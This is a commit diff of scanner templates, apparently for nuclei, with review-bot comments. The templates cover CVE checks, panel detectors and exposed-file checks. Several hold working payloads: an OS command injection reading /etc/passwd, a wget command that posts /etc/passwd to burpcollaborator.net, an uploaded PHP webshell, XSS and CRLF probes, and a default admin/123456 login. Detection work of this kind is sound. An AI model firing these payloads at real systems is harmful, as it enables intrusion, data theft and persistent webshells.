commit
b349e4aa0c
|
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
|
|||
|
||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||
| cves | 218 | vulnerabilities | 104 | exposed-panels | 90 |
|
||||
| exposures | 55 | technologies | 47 | misconfiguration | 49 |
|
||||
| workflows | 23 | miscellaneous | 16 | default-logins | 16 |
|
||||
| cves | 221 | vulnerabilities | 105 | exposed-panels | 95 |
|
||||
| exposures | 60 | technologies | 50 | misconfiguration | 50 |
|
||||
| workflows | 23 | miscellaneous | 16 | default-logins | 17 |
|
||||
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
||||
| helpers | 2 | takeovers | 1 | - | - |
|
||||
|
||||
**68 directories, 653 files**.
|
||||
**69 directories, 672 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
|
@ -27,3 +27,4 @@ requests:
|
|||
- "</password>"
|
||||
- "DEVICE.ACCOUNT"
|
||||
part: body
|
||||
condition: and
|
|
@ -23,12 +23,19 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "uid(.*)"
|
||||
- "gid(.*)"
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- "uid="
|
||||
- "gid="
|
||||
- "groups="
|
||||
condition: and
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- text/plain
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
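Review bot: The new word matcher fires on any text/plain 200 body that contains `uid=`, `gid=` and `groups=`, which is looser than the `id` output it is meant to detect — a script source or help page served as plain text can satisfy all three. The old `uid(.*)` regex was too broad in the other direction, but a regex matcher can keep the intent without either problem: `regex:` / `- 'uid=\d+\([^)]+\) gid=\d+\([^)]+\)'` (single-quoted so YAML does not try to interpret the backslashes). The enclosing request starts outside this hunk.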
|
||||
|
|
|
@ -9,14 +9,14 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/webapp/?fccc0\"><script>alert(1)</script>5f43d=1"
|
||||
- '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "\"><script>alert(1)</script>"
|
||||
- "<svg/onload=alert(xss)>"
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
|
|
|
@ -11,7 +11,7 @@ info:
|
|||
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
|
||||
Kylin's configuration information without any authentication,
|
||||
so it is dangerous because some confidential information entries will be disclosed to everyone.
|
||||
reference: ttps://nvd.nist.gov/vuln/detail/CVE-2020-13937
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13937
|
||||
tags: cve,cve2020,apache
|
||||
|
||||
# References:
|
||||
|
@ -29,13 +29,15 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
condition: and
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "config"
|
||||
- config
|
||||
- kylin.metadata.url
|
||||
condition: and
|
||||
part: body
|
||||
|
|
|
@ -9,13 +9,13 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/control/stream?contentId=<svg/onload=alert(1)>'
|
||||
- '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=alert(1)>"
|
||||
- "<svg/onload=alert(xss)>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: CVE-2020-21224
|
||||
|
||||
info:
|
||||
name: Inspur ClusterEngine V4.0 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
|
||||
tags: cve,cve2020,clusterengine,rce
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- '{{BaseURL}}/login.php'
|
||||
body: "op=login&username=;`cat /etc/passwd`&password="
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
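Review bot: The form body is sent without a `Content-Type`, and unless nuclei adds `application/x-www-form-urlencoded` implicitly for `body:`, PHP's `$_POST` on the target stays empty and the check silently never fires; add `headers:` / `Content-Type: application/x-www-form-urlencoded` under the request. The injected `username=;`cat /etc/passwd`` executes a command on the target and reads a sensitive file, yet `info` carries no `description` saying so — a one-line `description: Unauthenticated OS command injection in the login.php username parameter; the check runs a command on the target.` would tell operators what they are launching. Note that `root:[x*]:0:0` is a character class matching a single `x` or `*`, which works for passwd entries but is easy to misread as a wildcard.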
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2021-21315
|
||||
|
||||
info:
|
||||
name: Node.js Systeminformation Command Injection
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
|
||||
tags: nodejs,cve,cve2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20burpcollaborator.net)"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "application/json"
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "wget --post-file /etc/passwd burpcollaborator.net"
|
||||
- name
|
||||
- running
|
||||
- pids
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
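Review bot: The payload on the `path` line posts the target's /etc/passwd to burpcollaborator.net, a host the template user does not control, and the matchers never confirm execution — the `wget --post-file /etc/passwd burpcollaborator.net` word only checks that the API echoed the `name` value back, which happens whether or not a shell ran it. A probe that leaks nothing is safer, e.g. `name[]=$(sleep%205)`, with detection on the response delay instead of the echoed string (a `dsl` matcher on `duration`, if this nuclei version supports it). At minimum the exfiltration destination should be a placeholder the operator must replace, and `description` should state that the check has a side effect on the target.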
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2021-27132
|
||||
|
||||
info:
|
||||
name: CRLF Injection - Sercomm VD625
|
||||
author: geeknik
|
||||
severity: medium
|
||||
description: Sercomm AGCOMBO VD625 Smart Modems with firmware version AGSOT_2.1.0 are vulnerable to CRLF Injection via the Content-Disposition header - https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132
|
||||
tags: cve,cve2021,crlf
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20example.com%0d%0aX-XSS-Protection:0"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 404
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "Content-Disposition: attachment;filename=test.txt"
|
||||
- "Set-Cookie:CRLFInjection=Test"
|
||||
- "Location: example.com"
|
||||
- "X-XSS-Protection:0"
|
||||
part: header
|
||||
condition: and
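Review bot: `part: header` under the `status` matcher is meaningless — status matchers do not take a part — so the line after `- 404` should go, and the blog URL folded into `description` belongs in a `reference:` key, which is how the other templates in this commit record sources: `reference: https://cybertuz.com/blog/post/crlf-injection-CVE-2021-27132`. Requiring all four injected headers with `condition: and` is a good precision choice; the `Content-Disposition: attachment;filename=test.txt` entry is the server's own header rather than injected content, so it only needs to stay if the injection is specific to that header path, which the description suggests it is.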
|
|
@ -1,10 +1,10 @@
|
|||
id: CVE-2021-3129
|
||||
|
||||
info:
|
||||
name: Ignition Laravel RCE
|
||||
name: LARAVEL <= V8.4.2 DEBUG MODE - REMOTE CODE EXECUTION
|
||||
author: z3bd
|
||||
severity: critical
|
||||
description: Detect Ignition before 2.5.2, as used in Laravel, allows unauthenticated RCE.
|
||||
description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
|
||||
reference: https://www.ambionics.io/blog/laravel-debug-rce
|
||||
tags: cve,cve2021,laravel,rce
|
||||
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: alibaba-canal-default-password
|
||||
|
||||
info:
|
||||
name: Alibaba Canal Default Password
|
||||
author: pdteam
|
||||
severity: high
|
||||
tags: alibaba,dlogin
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/api/v1/user/login"
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: |
|
||||
{"username":"admin","password":"123456"}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- 'data":{"token"'
|
||||
- '"code":20000'
|
||||
condition: and
|
|
@ -44,7 +44,7 @@ requests:
|
|||
- j5Brn9
|
||||
- tomcat
|
||||
|
||||
attack: clusterbomb # Available options: sniper, pitchfork and clusterbomb
|
||||
attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
|
||||
|
||||
raw:
|
||||
# Request with simple param and header manipulation with DSL functions
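Review bot: Switching to `pitchfork` pairs the username and password lists by index, so the attempts drop from the product of the two lists to the length of the shorter one, and any password beyond the username list's length — the `j5Brn9`/`tomcat` entries visible here are near the end of that list — is never tried unless the lists are equal-length and aligned as intended pairs. Both payload lists start outside this hunk, so verify they line up, and make the expectation explicit in the trailing comment: `attack: pitchfork # lists are index-paired: username[i] with password[i]`.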
|
||||
|
|
|
@ -0,0 +1,23 @@
|
|||
id: acunetix-panel-detect
|
||||
|
||||
info:
|
||||
name: Acunetix Panel detector
|
||||
author: joanbono
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/#/login"
|
||||
headers:
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Acunetix</title>'
|
||||
- '<acx-root></acx-root>'
|
||||
part: body
|
||||
- type: status
|
||||
status:
|
||||
- 200
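Review bot: `{{BaseURL}}/#/login` contains a URL fragment, which HTTP clients normally strip before sending; depending on how nuclei builds the request line this either fetches `/` or sends a literal `#/login` that the server never routes on. Use `{{BaseURL}}/` (or whichever path actually serves the SPA shell) so the intent is explicit. The two body words have no `condition`, so either `<title>Acunetix</title>` or `<acx-root></acx-root>` alone matches — acceptable for detection, but worth a comment so nobody later tightens it by accident.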
|
|
@ -0,0 +1,18 @@
|
|||
id: checkmarx-panel-detect
|
||||
|
||||
info:
|
||||
name: Checkmarx WebClient detector
|
||||
author: joanbono
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cxwebclient/Login.aspx"
|
||||
headers:
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '/CxWebClient/webApp/Scripts/libs/authenticationScripts'
|
||||
part: body
|
|
@ -0,0 +1,18 @@
|
|||
id: hmc-hybris-panel
|
||||
|
||||
info:
|
||||
name: SAP Hybris Management Console
|
||||
author: dogasantos
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/hmc/hybris"
|
||||
- "{{BaseURL}}/hybris/hmc/hybris"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "hybris Management Console"
|
||||
part: body
|
|
@ -0,0 +1,26 @@
|
|||
id: nessus-panel-detect
|
||||
|
||||
info:
|
||||
name: Nessus Panel detector
|
||||
author: joanbono
|
||||
severity: info
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/server/status"
|
||||
headers:
|
||||
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '{"code":200,"progress":null,"status":"ready"}'
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- 'NessusWWW'
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 200
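Review bot: The body matcher expects the exact string `{"code":200,"progress":null,"status":"ready"}`, so a Nessus instance that reports any other state (for example while still initializing, if the server does so) or emits different key order or whitespace is missed, even though `NessusWWW` in the header already identifies it and `matchers-condition: and` requires all three matchers. Loosen the body check to `- '"status":'` or drop it and rely on the `NessusWWW` header plus status 200; the full JSON string can stay as a comment documenting the expected ready-state response.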
|
|
@ -0,0 +1,25 @@
|
|||
id: exposed-bitkeeper
|
||||
|
||||
info:
|
||||
name: Exposed BitKeeper Directory
|
||||
author: daffainfo
|
||||
severity: low
|
||||
reference: https://www.bitkeeper.org/man/config-etc.html
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/BitKeeper/etc/config"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "logging"
|
||||
- "email"
|
||||
- "description"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,24 @@
|
|||
id: exposed-bzr
|
||||
|
||||
info:
|
||||
name: Exposed BZR Directory
|
||||
author: daffainfo
|
||||
severity: low
|
||||
reference: http://doc.bazaar.canonical.com/beta/en/user-reference/configuration-help.html
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/.bzr/branch/branch.conf"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "parent_location"
|
||||
- "push_location"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,22 @@
|
|||
id: exposed-darcs
|
||||
|
||||
info:
|
||||
name: Exposed Darcs Config
|
||||
author: daffainfo
|
||||
severity: low
|
||||
reference: http://darcs.net/Using/Configuration#sources
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/_darcs/prefs/binaries"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Binary file regexps"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,22 @@
|
|||
id: exposed-hg
|
||||
|
||||
info:
|
||||
name: Exposed HG Directory
|
||||
author: daffainfo
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/.hg/hgrc"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "[paths]"
|
||||
- "default"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
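Review bot: This template has two matchers but no `matchers-condition`, and nuclei defaults to `or`, so any 200 response for `/.hg/hgrc` — a catch-all page, a SPA index — is reported as an exposed repository. The sibling templates in this commit (`exposed-bzr`, `exposed-bitkeeper`) set `matchers-condition: and` above `matchers:`; add the same line here. `default` is also a very generic word; `[paths]` together with `default =` would better match an actual hgrc.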
|
|
@ -0,0 +1,30 @@
|
|||
id: joomla-config-dist-file
|
||||
|
||||
info:
|
||||
name: Joomla Config Dist File
|
||||
author: oppsec
|
||||
severity: low
|
||||
description: configuration.php-dist is a file created by Joomla to save Joomla settings.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/configuration.php-dist"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "Joomla"
|
||||
- "JConfig"
|
||||
- "@package"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/plain"
|
||||
part: header
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -2,7 +2,7 @@ id: phpinfo-files
|
|||
|
||||
info:
|
||||
name: phpinfo Disclosure
|
||||
author: pd-team
|
||||
author: pd-team & daffainfo
|
||||
severity: low
|
||||
|
||||
requests:
|
||||
|
@ -21,8 +21,10 @@ requests:
|
|||
- "{{BaseURL}}/time.php"
|
||||
- "{{BaseURL}}/index.php"
|
||||
- "{{BaseURL}}/temp.php"
|
||||
- "{{BaseURL}}/PHPInfo.php"
|
||||
- "{{BaseURL}}/old_phpinfo.php"
|
||||
- "{{BaseURL}}/infos.php"
|
||||
- "{{BaseURL}}/linusadmin-phpinfo.php"
|
||||
- "{{BaseURL}}/php-info.php"
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
|
|
|
@ -0,0 +1,26 @@
|
|||
id: burp-rest-api-detect
|
||||
|
||||
info:
|
||||
name: Burp Rest API Server Running
|
||||
author: joanbono
|
||||
severity: info
|
||||
reference: https://portswigger.net/burp/documentation/enterprise/api-reference
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/v0.1/"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '<title>Burp API</title>'
|
||||
part: body
|
||||
- type: word
|
||||
words:
|
||||
- 'X-Burp-Version'
|
||||
part: header
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,36 @@
|
|||
id: ilo-detect
|
||||
|
||||
info:
|
||||
name: HP iLO
|
||||
author: milo2012
|
||||
severity: info
|
||||
description: Version of HP iLO
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/xmldata?item=all"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- text/xml
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- <RIMP>
|
||||
- <HSI>
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- "<FWRI>([0-9.]+)</FWRI>"
|
|
@ -0,0 +1,31 @@
|
|||
id: microsoft-echange-server-detect
|
||||
|
||||
info:
|
||||
name: Microsoft Exchange Server Detect
|
||||
author: pikpikcu
|
||||
severity: info
|
||||
reference: https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange.nse
|
||||
description: |
|
||||
Check for Exchange Server CVEs CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065,using Outlook Web App path data.
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/owa/auth/logon.aspx"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)"
|
||||
part: all
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
part: header
|
||||
kval:
|
||||
- X-Owa-Version
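Review bot: The `id` is misspelled (`microsoft-echange-server-detect`), and the `description` promises a check for four CVEs while the matchers only fingerprint an OWA logon page and the extractor pulls `X-Owa-Version`; nothing compares the build against fixed versions, so a patched server matches exactly like a vulnerable one. Rename to `microsoft-exchange-server-detect` and describe what it does: `description: Detects Microsoft Exchange Server via the OWA logon page and extracts the X-Owa-Version build; compare the build manually against the fixed versions for the listed CVEs.` The `info` severity is correctly kept at detection level.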
|
|
@ -10,7 +10,7 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E'
|
||||
- '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E'
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
@ -19,7 +19,7 @@ requests:
|
|||
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=alert(1337)>"
|
||||
- "<svg/onload=alert(xss)>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
|
|
|
@ -0,0 +1,53 @@
|
|||
id: simple-employee-rce
|
||||
|
||||
info:
|
||||
name: Simple Employee Records System 1.0 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://www.exploit-db.com/exploits/49596
|
||||
tags: rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /dashboard/uploadID.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: deflate
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337
|
||||
Content-Length: 267
|
||||
DNT: 1
|
||||
Connection: close
|
||||
|
||||
-----------------------------5825462663702204104870787337
|
||||
Content-Disposition: form-data; name="employee_ID"; filename="poc.php"
|
||||
Content-Type: image/png
|
||||
|
||||
<?php
|
||||
$cmd=$_GET['cmd'];
|
||||
system($cmd);
|
||||
?>
|
||||
-----------------------------5825462663702204104870787337--
|
||||
- |
|
||||
GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Content-Length: 2
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: endpoint
|
||||
part: body
|
||||
internal: true
|
||||
regex:
|
||||
- '(?:[a-zA-Z0-9+\/])*_poc.php'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
condition: and
|
||||
part: body
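Review bot: The first raw request uploads `<?php $cmd=$_GET['cmd']; system($cmd); ?>` to the target and nothing removes it, so every scan leaves an unauthenticated webshell under `/uploads/employees_ids/` that anyone who guesses the name can use; a proof of upload does not need that. Replace the file body with a fixed-output marker such as `<?php echo md5('nuclei-poc'); ?>`, fetch `/uploads/employees_ids/{{endpoint}}` without `?cmd=`, and match the resulting hash instead of `root:[x*]:0:0`; add a `description` stating that a file is written to the target. The hard-coded `Content-Length: 267` on the upload and `Content-Length: 2` on a bodiless GET only work if nuclei recomputes them for raw requests — if it does not, the multipart body is truncated or the GET hangs, so either verify that or drop both lines. `condition: and` on a single-entry regex matcher is a no-op and can go.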
|